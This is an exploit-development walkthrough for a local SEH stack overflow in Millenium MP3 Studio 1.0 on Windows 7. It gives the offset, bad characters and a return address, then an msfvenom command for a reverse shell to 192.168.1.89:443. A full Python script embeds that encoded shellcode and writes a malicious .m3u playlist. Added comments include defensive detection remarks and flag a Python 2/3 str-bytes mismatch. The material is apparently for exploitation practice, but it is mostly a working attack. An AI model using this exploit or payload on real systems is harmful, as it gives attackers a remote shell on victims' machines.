Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2) Walkthrough

reference Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

Actually, the original exploit still generates an .m3u playlist.
So this post will focus on the .m3u file format.

badchar

omitted
\x00\x0a\x0d\x1a

offset

omitted
4107

return address

seh

omitted
xaudio.dll 0x1001f668

shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443 -f python -v shellcode -b "\x00\x0a\x0d\x1a"

exploit.py

exploit.py
# Encoded payload as emitted by the msfvenom command shown above
# (windows/shell_reverse_tcp, -f python, badchars \x00\x0a\x0d\x1a excluded).
# It is treated as an opaque byte string here; nothing below inspects it.
# NOTE(review): this is a bytes literal, while `payload` further down is built
# from str literals — the two are concatenated later, so the script's behaviour
# depends on which interpreter version runs it (confirm before relying on it).
shellcode =  b""
shellcode += b"\xb8\xcb\xdf\x29\x1c\xda\xc7\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x52\x31\x42\x12\x83\xea\xfc"
shellcode += b"\x03\x89\xd1\xcb\xe9\xf1\x06\x89\x12\x09\xd7"
shellcode += b"\xee\x9b\xec\xe6\x2e\xff\x65\x58\x9f\x8b\x2b"
shellcode += b"\x55\x54\xd9\xdf\xee\x18\xf6\xd0\x47\x96\x20"
shellcode += b"\xdf\x58\x8b\x11\x7e\xdb\xd6\x45\xa0\xe2\x18"
shellcode += b"\x98\xa1\x23\x44\x51\xf3\xfc\x02\xc4\xe3\x89"
shellcode += b"\x5f\xd5\x88\xc2\x4e\x5d\x6d\x92\x71\x4c\x20"
shellcode += b"\xa8\x2b\x4e\xc3\x7d\x40\xc7\xdb\x62\x6d\x91"
shellcode += b"\x50\x50\x19\x20\xb0\xa8\xe2\x8f\xfd\x04\x11"
shellcode += b"\xd1\x3a\xa2\xca\xa4\x32\xd0\x77\xbf\x81\xaa"
shellcode += b"\xa3\x4a\x11\x0c\x27\xec\xfd\xac\xe4\x6b\x76"
shellcode += b"\xa2\x41\xff\xd0\xa7\x54\x2c\x6b\xd3\xdd\xd3"
shellcode += b"\xbb\x55\xa5\xf7\x1f\x3d\x7d\x99\x06\x9b\xd0"
shellcode += b"\xa6\x58\x44\x8c\x02\x13\x69\xd9\x3e\x7e\xe6"
shellcode += b"\x2e\x73\x80\xf6\x38\x04\xf3\xc4\xe7\xbe\x9b"
shellcode += b"\x64\x6f\x19\x5c\x8a\x5a\xdd\xf2\x75\x65\x1e"
shellcode += b"\xdb\xb1\x31\x4e\x73\x13\x3a\x05\x83\x9c\xef"
shellcode += b"\x8a\xd3\x32\x40\x6b\x83\xf2\x30\x03\xc9\xfc"
shellcode += b"\x6f\x33\xf2\xd6\x07\xde\x09\xb1\xe7\xb7\x10"
shellcode += b"\x18\x80\xc5\x12\x9b\xeb\x43\xf4\xf1\x1b\x02"
shellcode += b"\xaf\x6d\x85\x0f\x3b\x0f\x4a\x9a\x46\x0f\xc0"
shellcode += b"\x29\xb7\xde\x21\x47\xab\xb7\xc1\x12\x91\x1e"
shellcode += b"\xdd\x88\xbd\xfd\x4c\x57\x3d\x8b\x6c\xc0\x6a"
shellcode += b"\xdc\x43\x19\xfe\xf0\xfa\xb3\x1c\x09\x9a\xfc"
shellcode += b"\xa4\xd6\x5f\x02\x25\x9a\xe4\x20\x35\x62\xe4"
shellcode += b"\x6c\x61\x3a\xb3\x3a\xdf\xfc\x6d\x8d\x89\x56"
shellcode += b"\xc1\x47\x5d\x2e\x29\x58\x1b\x2f\x64\x2e\xc3"
shellcode += b"\x9e\xd1\x77\xfc\x2f\xb6\x7f\x85\x4d\x26\x7f"
shellcode += b"\x5c\xd6\x56\xca\xfc\x7f\xff\x93\x95\x3d\x62"
shellcode += b"\x24\x40\x01\x9b\xa7\x60\xfa\x58\xb7\x01\xff"
shellcode += b"\x25\x7f\xfa\x8d\x36\xea\xfc\x22\x36\x3f"

# Layout of the single playlist entry written to exploit.m3u.  The structure
# is the SEH-overwrite pattern the "seh" section above refers to: filler up to
# the crash offset, a 4-byte short jump, the overwritten handler address, a
# NOP sled, then the payload.  From a defensive standpoint, the entire trigger
# is a user-opened local file (see "Open File(s)..." below); a playlist line
# consisting of ~4 KB of identical bytes followed by a run of \x90 is itself a
# strong content-inspection signal for this class of file-format overflow.
payload = "http://"
# 4107 is the offset recorded above; 4 bytes are reserved for the jump below.
payload += "A" * (4107 - 4)
# \xeb\x26 is an x86 short JMP (rel8); the two \x41 bytes are padding that the
# jump skips over.  NOTE(review): where control lands after the jump is not
# shown on this page — presumably the NOP sled; confirm.
payload += "\xeb\x26\x41\x41"
# Little-endian 0x1001f668, the xaudio.dll address listed under "seh" above.
# Whether that module participates in SafeSEH/ASLR is not shown here; that is
# the property a hardening review of the application would check.
payload += "\x68\xf6\x01\x10"
# 32-byte NOP sled preceding the encoded payload.
payload += "\x90" * 32
# NOTE(review): `payload` is a str and `shellcode` is bytes; this concatenation
# and the text-mode write below are interpreter-version dependent (confirm
# which Python this was run under — the str escapes above suggest Python 2).
payload += shellcode

# Text-mode write; "exploit.m3u" is the file the walkthrough opens in the player.
with open("exploit.m3u", "w") as fp:
    fp.write(payload)

proof

Open File(s)...